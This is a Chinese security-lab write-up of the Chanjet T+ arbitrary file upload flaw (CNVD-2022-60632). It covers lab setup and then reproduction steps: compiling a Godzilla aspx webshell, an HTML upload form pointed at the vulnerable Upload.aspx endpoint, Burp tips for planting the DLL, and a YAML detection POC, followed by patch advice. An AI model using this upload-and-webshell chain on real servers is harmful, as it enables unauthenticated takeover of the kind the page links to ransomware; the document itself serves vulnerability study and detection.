畅捷通T+任意文件上传(CNVD-2022-60632 )-漏洞文库小世界-安全文库-NGC660 安全实验室

畅捷通T+任意文件上传(CNVD-2022-60632 )

0x01漏洞描述

2022年8月30日,国家信息安全漏洞共享平台(CNVD)收录了畅捷通T+软件任意文件上传漏洞(CNVD-2022-60632)。未经身份认证的攻击者可利用漏洞远程上传任意文件,获取服务器控制权限。目前,该漏洞已被发现利用进行勒索病毒攻击的情况,厂商已发布安全更新完成修复。

0x02影响范围

畅捷通T+单机版<=17.0且使用IIS10.0以下版本

0x03环境搭建

https://dad.chanapp.chanjet.com/TplusYZHJ17.0.zip

1、下载并解压

解压后文件如下:

m_ddf8f41a25287f91331d7cc9ce7cb966_r

2、环境检测

CheckEnvironment

m_31c63beba806c270c65504acb64f6253_r

m_fdc203f939d38a4f093872dfb65240d0_r

3、安装

直接双击

m_1023dc1db32361e834722621a265af7f_r

选择标准版

m_2ad1a0dbffc972762aa7f06cbc5ae51d_r

中间会出现需要配置数据库选择不设置就好。

4、完成安装

m_2e3ea8008040539f3f6a31d30a277b0b_r

0x04漏洞复现

1、首先需要一个aspx马(哥斯拉)

m_8185baf712f449953c55048fb496f48b_r

2、然后

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe -v / -p “aspx马的路径” “输出的路径” -fixednames

执行完毕后打开输出的路径下bin目录

m_6057654df85474bfae8298f30ac28707_r

3、构造一个本地上传代码

<form   action="http://192.168.77.131/tplus/SM/SetupAccount/Upload.aspx?preload=1" method=post name=myform enctype="multipart/form-data">
<input type=file name=File1 size=1 style="width:100%" onchange="originalfile.value=this.value">
<input type="submit" name="uploadfile" value="提交">
<input type=hidden name=originalfile value="">
</form>

4、上传

将刚才生成的两个文件上传到网站根目录下的bin目录下
type必须为“jpeg”

m_67e625c054df47c0d8dea437ea5b01a0_r

上传dll文件时需要改burp编码为raw,不然上传上去内容就会改变。

m_61312dbed5b174c5afcae6473b633d10_r

只需上传这两个文件即可

5、搞定

直接访问
http://x.x.x.x/tplus/aaa.aspx?preload=1

m_1ae2eab5b95b072d5e22e75ab571e1a1_r

哥斯拉连接
m_503290649b1894459319979055103884_r

0x05POC检测

params: []
name: 畅捷通 T+ 文件上传漏洞
set:
  ri: randomInt(800000000, 1000000000)
rules:
- method: POST
  path: /tplus/SM/SetupAccount/Upload.aspx?preload=1
  headers:
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywwk2ReqGTj7lNYlt
  body: |
    ------WebKitFormBoundarywwk2ReqGTj7lNYlt
    Content-Disposition: form-data; name="File1";filename="{{ri}}.html"
    Content-Type: image/jpeg

    {{ri}}
    ------WebKitFormBoundarywwk2ReqGTj7lNYlt--
  search: ""
  followredirects: false
  expression: 'response.status == 200 '
- method: GET
  path: /tplus/SM/SetupAccount/images/{{ri}}.html
  headers: {}
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(bytes(string(ri)))
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

m_a9bbab5bae0feb2dcb6e39afc8ee37ba_r

0x06 修复建议

1、官方补丁, https://www.chanjetvip.com/product/goods/goods-detail?id=53aaa40295d458e44f5d3ce5
2、WAF拦截。

请登录后发表评论

    请登录后查看回复内容